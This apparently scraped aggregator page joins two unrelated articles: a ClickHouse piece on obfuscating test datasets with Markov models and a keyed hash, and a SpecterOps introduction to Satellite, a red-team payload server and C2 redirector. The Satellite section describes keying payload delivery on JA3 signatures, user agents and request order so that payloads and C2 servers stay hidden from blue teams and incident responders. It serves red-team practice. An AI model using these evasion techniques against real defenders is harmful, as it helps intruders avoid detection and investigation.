The Feistel network is at the heart of several data encryption algorithms. What we're going to do is something like encryption, only it's really bad. There are two reasons for this:

1. We are encrypting individual values independently and in the same way, similar to the Electronic Codebook mode of operation.
2. We are storing information about the order of magnitude (the nearest power of two) and the sign of the value, which means that some values do not change at all.

This way we can obfuscate numeric fields while preserving the properties we need. For example, after using LZ4, the compression ratio should remain approximately the same, because the duplicate values in the source data will be repeated in the converted data, and at the same distances from each other.

Markov models

Text models are used for data compression, predictive input, speech recognition, and random string generation. A text model is a probability distribution of all possible strings. Let's say we have an imaginary probability distribution of the texts of all the books that humanity could ever write.
To generate a string, we just take a random value with this distribution and return the resulting string (a random book that humanity could write). But how do we find out the probability distribution of all possible strings?

First, this would require too much information. There are 256^10 possible strings that are 10 bytes in length, and it would take quite a lot of memory to explicitly write a table with the probability of each string. Second, we don't have enough statistics to accurately assess the distribution.

This is why we use a probability distribution obtained from rough statistics as the text model. For example, we could calculate the probability of each letter occurring in the text, and then generate strings by selecting each next letter with the same probability. This primitive model works, but the strings are still very unnatural.

To improve the model slightly, we could also make use of the conditional probability of the letter's occurrence if it is preceded by N specific letters. N is a pre-set constant. Let's say N = 5 and we are calculating the probability of the letter "e" occurring after the letters "compr". This text model is called an Order-N Markov model.

    P(cata | cat) = 0.8
    P(catb | cat) = 0.05
    P(catc | cat) = 0.1
    ...

Let's look at how Markov models work on the website of Hay Kranen. Unlike LSTM neural networks, the models only have enough memory for a small context of fixed-length N, so they generate funny, nonsensical texts. Markov models are also used in primitive methods for generating spam, and the generated texts can be easily distinguished from real ones by counting statistics that don't fit the model. There is one advantage: Markov models work much faster than neural networks, which is exactly what we need.

Example for Title (our examples are in Turkish because of the data used):

We can calculate statistics from the source data, create a Markov model, and generate new data with it.
Note that the model needs smoothing to avoid disclosing information about rare combinations in the source data, but this is not a problem. I use a combination of models from 0 to N. If statistics are insufficient for the model of order N, the N−1 model is used instead.

But we still want to preserve the cardinality of data. In other words, if the source data had 123456 unique URL values, the result should have approximately the same number of unique values. We can use a deterministically initialized random number generator to achieve this. The easiest way to do this is to use a hash function and apply it to the original value. In other words, we get a pseudorandom result that is explicitly determined by the original value.

Another requirement is that the source data may have many different URLs that start with the same prefix but aren't identical. For example: https://www.yandex.ru/images/cats/?id=xxxxxx. We want the result to also have URLs that all start with the same prefix, but a different one. For example: http://ftp.google.kz/cgi-bin/index.phtml?item=xxxxxx. As a random number generator for generating the next character using a Markov model, we'll take a hash function from a moving window of 8 bytes at the specified position (instead of taking it from the entire string).

    https://www.yandex.ru/images/cats/?id=12345
                          ^^^^^^^^

    distribution: [aaaa][b][cc][dddd][e][ff][ggggg][h]...
    hash("images/c") % total_count:   ^

    http://ftp.google.kz/cg...

It turns out to be exactly what we need.
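The scheme above can be sketched in Python as follows. This is a simplified illustration under stated assumptions, not the code of the actual tool: the constants `ORDER` and `MIN_COUNT`, the use of SHA-256 as the hash, the placement of the 8-byte window (ending at the current position), and the function names are all hypothetical, and the smoothing mentioned earlier is omitted for brevity. Each next character is chosen by `hash(window) % total_count` over the counts for the current context, falling back to a shorter context when statistics are insufficient.

```python
import hashlib
from collections import Counter, defaultdict

ORDER = 3      # maximum context length N (hypothetical choice)
WINDOW = 8     # bytes of the source value fed to the hash
MIN_COUNT = 2  # back off to a shorter context below this many observations
END = "\0"     # end-of-string marker


def train(samples):
    """Count next-character frequencies for every context of length 0..ORDER."""
    model = defaultdict(Counter)
    for text in samples:
        padded = text + END
        for i, ch in enumerate(padded):
            for n in range(ORDER + 1):
                if i - n >= 0:
                    model[padded[i - n:i]][ch] += 1
    return model


def pick(counter, number):
    """Select a character by walking the cumulative counts up to `number`."""
    number %= sum(counter.values())
    for ch, count in sorted(counter.items()):
        if number < count:
            return ch
        number -= count


def generate(model, source, seed):
    """Derive a pseudorandom string that is fully determined by `source`."""
    data = source.encode()
    out = ""
    for pos in range(len(data)):
        # The "random number" depends only on a moving window of the source.
        window = data[max(0, pos - WINDOW + 1):pos + 1]
        digest = hashlib.sha256(seed + window).digest()
        number = int.from_bytes(digest[:8], "big")
        # Use the longest context with enough statistics (orders N, N-1, ..., 0).
        context = out[-ORDER:]
        while context and sum(model.get(context, Counter()).values()) < MIN_COUNT:
            context = context[1:]
        ch = pick(model[context], number)
        if ch == END:
            break
        out += ch
    return out
```

Because every choice depends only on the source bytes seen so far, two source values that share a prefix produce outputs that share a prefix, and identical source values always produce identical outputs, which keeps the number of unique values approximately the same.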
Here's the example of page titles:

PhotoFunia - Haber7 - Hava mükemment.net Oynamak içinde şaşıracak haber, Oyunu Oynanılmaz • apród.hu kínálatában - RT Arabic PhotoFunia - Kinobar.Net - apród: Ingyenes | Posti PhotoFunia - Peg Perfeo - Castika, Sıradışı Deniz Lokoning Your Code, sire Eminema.tv/ PhotoFunia - TUT.BY - Your Ayakkanın ve Son Dakika Spor, PhotoFunia - big film izle, Del Meireles offilim, Samsung DealeXtreme Değerler NEWSru.com.tv, Smotri.com Mobile yapmak Okey PhotoFunia 5 | Galaxy, gt, după ce anal bilgi yarak Ceza RE050A V-Stranç PhotoFunia :: Miami olacaksını yerel Haberler Oyun Young video PhotoFunia Monstelli'nin En İyi kisa.com.tr –Star Thunder Ekranı PhotoFunia Seks - Politika,Ekonomi,Spor GTA SANAYİ VE PhotoFunia Taker-Rating Star TV Resmi Söylenen Yatağa każdy dzież wierzchnie PhotoFunia TourIndex.Marketime oyunu Oyna Geldolları Mynet Spor,Magazin,Haberler yerel Haberleri ve Solvia, korkusuz Ev SahneTv PhotoFunia todo in the Gratis Perky Parti'nin yapıyı bu fotogram PhotoFunian Dünyasın takımız halles en kulları - TEZ

Results

After trying four methods, I got so tired of this problem that it was time to just choose something, make it into a usable tool, and announce the solution. I chose the solution that uses random permutations and Markov models parametrized by a key. It is implemented as the clickhouse-obfuscator program, which is very easy to use. The input is a table dump in any supported format (such as CSV or JSONEachRow), and the command line parameters specify the table structure (column names and types) and the secret key (any string, which you can forget immediately after use). The output is the same number of rows of obfuscated data.

The program is installed with clickhouse-client, has no dependencies, and works on almost any flavor of Linux. You can apply it to any database dump, not just ClickHouse.
For instance, you can generate test data from MySQL or PostgreSQL databases or create development databases that are similar to your production databases.

    clickhouse-obfuscator \
        --seed "$(head -c16 /dev/urandom | base64)" \
        --input-format TSV --output-format TSV \
        --structure 'CounterID UInt32, URLDomain String, \
        URL String, SearchPhrase String, Title String' \
        < table.tsv > result.tsv

    clickhouse-obfuscator --help

Of course, everything isn't so cut and dried, because data transformed by this program is almost completely reversible. The question is whether it is possible to perform the reverse transformation without knowing the key. If the transformation used a cryptographic algorithm, this operation would be as difficult as a brute-force search. Although the transformation uses some cryptographic primitives, they are not used in the correct way, and the data is susceptible to certain methods of analysis. To avoid problems, these issues are covered in the documentation for the program (access it using --help).

In the end, we transformed the data set we need for functional and performance testing, and the Yandex VP of data security approved publication.

    clickhouse-datasets.s3.yandex.net/hits/tsv/hits_v1.tsv.xz
    clickhouse-datasets.s3.yandex.net/visits/tsv/visits_v1.tsv.xz

Non-Yandex developers use this data for real performance testing when optimizing algorithms inside ClickHouse. Third-party users can provide us with their obfuscated data so that we can make ClickHouse even faster for them. We also released an independent open benchmark for hardware and cloud providers on top of this data: clickhouse.yandex/benchmark_hardware.html

Source: https://habr.com/en/company/yandex/blog/485096/
    1 point
  7. Satellite is an alternative to Apache and Nginx for payload hosting as well as an alternative to Caddy for C2 traffic redirection. I focused on making the project feature rich, easy-to-use, and reliable. The source and compiled binaries can be found on GitHub.

During my internship at SpecterOps this past summer, I had the opportunity to sit next to Lee Christensen, who gave me the idea to pursue this project. He thought it would be a cool idea if an operator could key their payload downloads based on JA3 signatures. I mocked up a basic web server that would serve a request only if it matched a predefined JA3 signature, using CapacitorSet’s ja3-server package as a model. (For those not familiar with JA3, check out the writeup I contributed to, Impersonating JA3 Fingerprints.) Once I had the skeleton for payload delivery and HTTP proxying, I took on the task of creating a drop-in replacement for Apache mod_rewrite and Nginx. Satellite now has the ability to filter traffic based on the number of times a payload has been served, the User Agent, JA3 signatures, prerequisite paths (which I’ll show off later) and more. Satellite is not intended to provide the flexibility of mod_rewrite, but instead to enable easy payload delivery keying with features almost impossible to replicate in mod_rewrite.

Feature Highlights

JA3 Payload Delivery Keying
Request Order Payload Delivery Keying
Configurable Payload Lifetime
C2 Traffic Redirection (Proxying)
Scriptable Request Keying
Easy Credential Capture
Global Request Filtering

How to Install

As previously mentioned, a large focus of the project was to make traffic keying easy to set up. This extends from usage to installation. The easiest installation method is to use the Debian software package format (.deb) on a Debian-based system, which only requires downloading the file and using dpkg to install it. You can use the Installation wiki page to learn how to install Satellite on non-Debian systems.
Route Configuration

In Satellite, a route is the page requested by the user. The content of a route can be configured in the same way one configures a route in Apache or Nginx: put a file in the server root. By default, Satellite uses /var/www/html as the directory to serve files from, but that can be changed in the server config. Once Satellite is installed and running, you can begin serving pages.

The “.info” file is where the magic of Satellite happens. The “.info” file is a YAML file that specifies what special actions should happen when a file is requested. These actions can either be keying options to protect a payload from unwanted requests (for example, from a member of the blue team) or directives like on_failure, which specifies what should happen to the request if the key does not match.

In addition to serving files, operators can also use the same keying options for traffic redirection using the proxy option. There is a special file in the server_root called proxy.yml which allows users to make a list of routes they’d like to proxy without having to create a dummy file. The proxy file works the same as a normal “.info” file, so the keying options that work on a payload also work with proxying. See the proxy example on GitHub for an in-depth explanation.

I’ll go over a few keying options to solidify the point. First, the serve option allows operators to specify how many times they’d like a file to be served before it becomes inaccessible. This is a useful option when a payload only has one target. When the target downloads the file, the payload is no longer accessible through the web server.

Next is blacklist_useragents. As the name implies, one can blacklist User Agents from accessing a payload. The field matches a regular expression, so an operator can approximate blocking Linux clients by using:

    blacklist_useragents:
      - *Linux*

Next, and maybe the most important, is on_failure. This option specifies what happens when a request fails to match a key.
I’ll go more in-depth about on_failure in the Server Configuration section.

Prereq Directive

Next, the prereq directive is a really simple way to force requesters to access a set of paths before accessing another. This is useful when an operator uses ClickOnce for initial access. The ClickOnce application will first request the path /<name>/tracker.jpg before accessing ClickOnce.application. Using the prereq directive, an operator is able to deny access to ClickOnce.application if the requester has not requested /<name>/tracker.jpg.

For a simple example, if an operator knows their payload will request /a.jpeg and /metadata.json before it finally requests /payload, the operator can use the contents of the following file, payload.info, to only serve /payload once /a.jpeg and /metadata.json have been requested:

    prereq:
      - /a.jpeg
      - /metadata.json

The example in the wiki shows how an operator can stack prereqs to force users to request one path after another.

There are many ways this could be implemented, so understanding how it works is important. First, Satellite tracks users based on IP addresses since cookies may not be obeyed by the client. This means that if several requesters with the same external IP are requesting pages, Satellite could fail to serve the payload even if one user requested each page in order. Second, the requests are matched consecutively, limited by the number of paths in the prereq list. This means that if the prereq directive states “access /one then access /two before accessing /payload”, but the user requests “/three, /one, /two, /payload,” Satellite will serve the payload. Using the same example, Satellite will not serve the request “/two, /one, /payload.” Testing this technique doesn’t work very well on browsers (especially Chrome) because requests are typically performed multiple times for preemptive rendering and caching reasons.

authorized_ja3

Last, authorized_ja3 only allows specific JA3 signatures to access the payload.
In my opinion, this is less useful for payload hosting unless you do intelligence gathering beforehand, but is extremely powerful for redirector proxying. JA3 signatures could stay the same between C2 agents unless the agent uses the operating system’s HTTP library for making calls and therefore presents varying JA3 signatures. In the case of static C2 agent JA3 signatures, you can key a Satellite route to only communicate with requestors that match a predefined C2 agent’s JA3 signature. This technique is useful to hide characteristics of a backend C2 server and the true purpose of a configured proxy route. For example, during an ongoing IR investigation, an incident responder could pull their proxy/netflow data from your C2 channel and mimic a request to the redirector’s configured route. However, unless they can also identify and replicate arbitrary JA3 signatures (ja3transport), they will not be able to directly interact with the backend C2 server, which hides the true nature of a route and prevents C2 server fingerprinting.

Global Conditions

If an operator has a list of keys they know they want to use for every operation, global conditions can be applied. Files in the /etc/satellite/conditions/ directory will be combined and applied to all Satellite requests. An example and deeper explanation can be found on the wiki.

There are many more options to check out, like authorized_countries, prereq, and blacklist_iprange, which are listed on the Route Configuration wiki page.

Server Configuration

Out of the box, there is no required configuration in order to start serving pages. Satellite looks in three places to find server configuration: $HOME/.config/satellite/config.yml, $HOME/.satellite/config.yml, and /etc/satellite/config.yml. Once a valid configuration file is found, it validates the configuration settings and starts the server. Satellite’s server configuration options will be familiar if you’ve used other web servers like Apache or Nginx.
For example, the default index, the listening port, and the server header are configurable. I’ll mention two things which are a bit different than normal web servers. The not_found option has either the subkey of redirect or render. The redirect option will perform a “301 redirect” to a specified site while the render option will perform a “200 OK” render of the page specified. The not_found option is also the default catch-all when a route does not match a request but does not specify a not_found option itself.

Example

Here is a video of how to use Satellite to key a payload.

Source: https://posts.specterops.io/satellite-a-payload-and-proxy-service-for-red-team-operations-aa4500d3d970
    1 point